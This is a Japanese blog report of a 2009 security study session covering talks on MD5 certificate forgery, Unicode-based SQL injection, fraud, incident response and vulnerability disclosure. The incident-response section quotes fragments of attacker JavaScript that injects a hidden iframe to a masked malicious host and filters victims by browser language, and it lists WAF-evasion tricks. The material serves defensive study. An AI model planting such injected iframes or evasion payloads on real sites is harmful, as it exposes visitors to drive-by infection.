第04回まっちゃ445勉強会

| | コメント(0) | トラックバック(0)

・まっちゃ445勉強会 (まっちゃ445勉強会)
http://matcha445.techtalk.jp/ (Google Sites)

・第04回まっちゃ445勉強会 (まっちゃ445勉強会)
http://matcha445.techtalk.jp/saturday-workshop/4th-workshop (Google Sites)

(2009/02/04 追記 ここから)
・第4回 発表・ディスカッション補足資料 - まっちゃ445勉強会メーリングリスト | Google グループ
http://groups.google.co.jp/group/matcha445/browse_thread/thread/bd0442a22958942d

・2009年1月31日(土曜日) | 水無月ばけらのえび日記
http://bakera.jp/ebi/2009/1/31 (1 2 3)
(2009/02/04 追記 ここまで)

今回はロシアンルーレットLTは無かった。
第05回まっちゃ445勉強会(2/28)ではあるかも (まだ未定)。

JPCERT/CCの方から「経済産業省 CHECK PC!」の告知がありました。イメージキャラクターは 眞鍋かをり(2006)、白石美帆(2007)、上戸彩(2008)を起用してきましたが、今年は オリジナルキャラクターの「情報セキュリティアイドル『セキュリーナ』(2009) とのこと。

目覚まし勉強会 (ライトニングトーク)
MD5コリジョンによる偽造SSL証明書について
hitoさん


MD5の強衝突耐性は突破されている。
MD5の弱衝突耐性は突破されてない。

証明書のシリアルNoを +1 してるCAがあった (予測可能)
そういうCAは駆逐されたので、もう問題ないらしい。

うーん、こう認識したけど、ついていけなかったから合ってるだろうか?


UNICODEによるSQLインジェクションおよびXSSの可能性
徳丸浩さん (はてな)


「UnicodeによるXSSとSQLインジェクションの可能性」プレゼン資料 (2009/10/16 追記)

UNICODEは文字集合。
UNICODEとCP932などでは 多対1 の変換になってしまう。

「Ä」と「®」をSQLServerにInsertしてみる。
「nchar」と「nvarchar」のフィールドにはそのままInsertできるが、「char」と「varchar」のフィールドには「A」と「R」に変換されてInsertされる。

SQLServerにUnicodeの文字をInsertしてみる

Unicode→CP932変換してるようだ。
SQLインジェクションやXSSが可能になるかも。

対策:
1:1ではないので、文字集合の変換はできない。
変換しないで済むようにする。
SQL Serverでは「nchar」「nvarchar」「ntext」などUNICODEを扱えるフィールドを使う。


Sparkingしよう
ゆまのさん (G資料直リンク)


マイクロソフトが提供する学生支援プログラム「Microsoft DreamSpark」の話。
申し込みの手順などの紹介。

卒業後もその製品をずっと使えるので、卒業間近の人は急いで申し込んでおこうという話し。
そして、IT業界に貢献しようという話し。

国際学生証ISICカードが必要になる。大学生協などで作成できる。

このサイトでもソフトウェア入手方法の説明があった。


振り込め詐欺が無くならない
aidoさん


・変化

  1. 「オレオレ」と言って孫を装って振り込ませる
  2. 本人、示談相手、警察などが出てくる
  3. 年金、保険金の還付と偽って振り込ませる (関西の人も騙される)
  4. 呼び出してるうちに自宅に忍び込んで盗んでいく方法なども・・・

・対応

  • 警察がATMに張り付く (大幅に減ったが、いつまでも張り付いていられない)
  • 行員が声掛けを行う (が、警察を含め説得しても振り込んでしまう人もいた)
  • ・・・etc.

・ケータイを使う理由

  • 第三者に相談する暇を与えないため
  • 小さい声(聞き取りにくい声)だと一生懸命聞いてしまう人の心情を利用する
  • ・・・etc.

・ATMの近くではケータイを使えないようにする

  • 偽装・盗難カードの場合
    • (脆弱なシステムを作ったという理由で)銀行の責任
  • 振り込め詐欺の場合
    • 自らの意思で振り込んでいるので銀行は責任ない
    • ケータイを使えなくしたら、文句を言ってくる人が出るかも
    • ケータイを使えなくする機器が高い(300万円/台位)。全ATMに設置するのは大変

・対策

一人では対応しない。二人以上居れば、かなり防げるのでは?


ULCPCはDarwinの夢を見るか?
yaizawaさん


ULCPC (ウルトラローコストPC)


モテエンジニアのススメ
kawaさん@チームチドリ


とっても参考になったのは、男女の幸せの壷の大きさの話。

  • 男は大きな壷
    • なかなか幸せを感じないが、なかなかなくならない。
    • 例:大きなプロジェクトをやり遂げたら、脳が麻痺して暫くは達成感が続く。
  • 女は小さな壷
    • すぐに一杯になるがなくなるのも速い。
    • 小さい事で幸せを感じれるが、毎日幸せを入れる必要がある。


第04回まっちゃ445勉強会

インシデントレスポンスの現場から ~事件は会議室で起きているんじゃない。現場で起きているんだ。~
株式会社ラック 川口さん


感染済みのPCにはそれ以上感染を行わない。
例えば、AntivirXP08の場合、感染するとUserAgentが「AntivirXP08」に書き換えられる。UserAgentが「AntivirXP08」だった場合、IFRAMEタグを埋め込まない

if(navigator.userAgent.indexOf('AntivirXP08')==-1) {
    <br />
    document.write("&lt;iframe src=http://********.com/****/****.cgi?script width=0 height=0 frameborder=0&gt;&lt;/iframe&gt;");
    <br />
}

また、言語によりターゲットを絞り込む。

n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN&quot;)        && (n!=&undefined;ZH-MO&quot;) &&
   (n!=&quot;BN&quot;)      && (n!=&quot;GU&quot;) &&
   (n!=&quot;NE&quot;)      && (n!=&quot;PA&quot;) &&
   (n!=&quot;ID&quot;)      && (n!=&quot;EN-PH&quot;) &&
   (n!=&undefined;UR&quot;) && (n!=&quot;ZH&quot;) &&
   (n!=&quot;HI&quot;)      && (n!=&quot;TH&quot;) &&
   (n!=&quot;VI&quot;)) {
     // COOKIEの発行やIFRAMEタグの埋め込み処理など
}

・IDS/IPS/WAF等をすり抜けようと試みる手法

  1. COOKIEにSQLインジェクションの文字列を埋め込む (特徴1)
  2. IIS/ASPでは、%に続く文字が16進数表記できない文字列が続いた場合、%を除去して、WebアプリケーションにSQL文を送り込む。 (特徴2)

気になる(危険そうな)サイトにアクセスする場合、 aguse.jp を使って表示すると良い。URLを入力すると、スクリーンショットや検出されたウイルス等を表示できる。

・対策が強い所/弱い所
(弱い所があると、そこから攻撃される。)

強い → 会社として方針が決まっている会社
弱い → 担当者(部署)それぞれが頑張って方針を決める。テスト(開発)環境。

第17回まっちゃ139勉強会で発表されたMSの小野寺匠さんの「2008年セキュリティインシデント総まとめ(仮題)(PDF)」が紹介された。全てをまとめ切らなかったので「(仮題)」が取れなかったのだとか。

リムーバブルドライブの自動実行の無効化手順について「MSの方法では不十分なのでは?」という思いがあり、JPCERT/CCさんが調査してるらしい。公開が待たれます。

(2008/02/05 追記 ここから)
JVNTA09-020A: Microsoft Windows 自動実行機能の無効化における注意点 (JPCERT/CC) が公開されました。

Microsoft Windows では自動実行機能を無効化することにより、悪意あるコードの実行を防ぐことができます。しかしながら Microsoft が提供する自動実行機能を無効化するためのドキュメント (文書番号: 953252) の手順では、対策が適用されないケースが存在します。
JVNTA09-020A: Microsoft Windows 自動実行機能の無効化における注意点

(2008/02/05 追記 ここまで)

(2009/02/28 追記 ここから)

JPCERT/CCさんは

Microsoft のドキュメント (91525) では NoDriveTypeAutoRun のレジストリキーを変更することで、自動実行機能を無効化することができると記載されていました。しかしながらこの変更だけを行っても、NoDriveTypeAutoRun の値を適切に参照しない問題があり、Autorun.inf の記述に従ってプログラムが実行されてしまう可能性があります。
JVNTA09-020A: Microsoft Windows 自動実行機能の無効化における注意点

としていたが、

【追記】 マイクロソフトはサポートドキュメント KB953252 を提供し、NoDriveTypeAutoRun の値を参照しない問題を修正する方法を記載しています。アップデートをインストール後、Windows は NoDriveTypeAutoRun の値を正しく参照します。
JVNTA09-020A: Microsoft Windows 自動実行機能の無効化における注意点

と追記された。

・関連

Autorunを無効にするには「NoDriveTypeAutoRun」のレジストリキーを設定する必要があるが、レジストリキーが想定通りに機能しないという問題が指摘されていた。これを修正するため、同様の更新プログラム(サポート技術情報953252)をすでに提供していたが、手動でインストールする必要があったという。今回、自動更新で配信するための更新プログラムを改めて公開した。
MS、Autorunを正しく無効化するための更新プログラムを公開

(2009/02/28 追記 ここまで)

インシデントレスポンスワーク EC-CUBEの事例
ロックオン 福田さん


脆弱性を見つけた時、JPCERT/CCさんに相談した。

2008/08/27 管理者権限を奪取できるSQLインジェクションを発見
2008/10/01 一般公開
1ヶ月強の間に何をしたか。どのように対応したか?

既存利用者と新規利用者保護のバランスが問題になった。

・とった対応

Step1. 把握している利用者に個別メール (口外しないように)
Step2. 管理者画面の「お知らせページ」に表示 (口外しないように)
Step3. 一般公開

修正パッチはメールで送らないように。丸秘サイト+認証ページなどで配布を行った。
利用してるユーザを把握しておく事は大切かも。

・広く公開する必要があるか?
→ 内容が致命的であった
→ 把握できていない利用者もいた
→ 公開した結果、信頼威勢の低下(ダウンロード数の減少)はなかった。むしろ上がった。


質疑で「第一段階でとるべきは個別メールではないのでは?いきなり一般公開にした方が安全なのでは?非一般に公開した場合、その人が悪意ある人だったら一般ユーザにとって致命的になる」という意見が出た。
個別メールを送った相手はアイデンティファイされている(=信頼できる、トラッキングできる)相手なのか?
プレミアム会員に公開する(プレミアムアップデート)方法はあるが、この場合アイデンティファイされている。

うーん、仮に自分が担当者だった場合、模範解答となる行動は何なんだろう・・・?


お菓子


雪苺娘。有楽町の店舗で買えるとの事。
プレイン、プリン、モモ、抹茶がありました。

第04回まっちゃ445勉強会で出た雪苺娘

コンビニで買えるのはヤマザキ製のはず。

特許電子図書館は現在サービス停止中で調べられないけど(2/2 08:00まで)、「雪苺娘」の商標登録は山崎製パン株式会社が持ってるっぽいから、これもヤマザキ製かなぁ?

(2009/03/01 追記 ここから)
やっぱり、山崎製パンの商標でした。
(2009/03/01 追記 ここまで)


トラックバック(0)

このブログ記事を参照しているブログ一覧: 第04回まっちゃ445勉強会

このブログ記事に対するトラックバックURL: http://kinshachi.ddo.jp/mt/mt-tb.cgi/519

コメントする


画像の中に見える文字を入力してください。

このブログ記事について

このページは、ikeが2009年1月31日 23:59に書いたブログ記事です。

ひとつ前のブログ記事は「古いエントリの変更履歴 (2008/12)」です。

次のブログ記事は「ゴミ箱から削除されたとき、復元不可能にするツールってないかな?」です。

最近のコンテンツはインデックスページで見られます。過去に書かれたものはアーカイブのページで見られます。

最近のコメント

Powered by Movable Type 4.261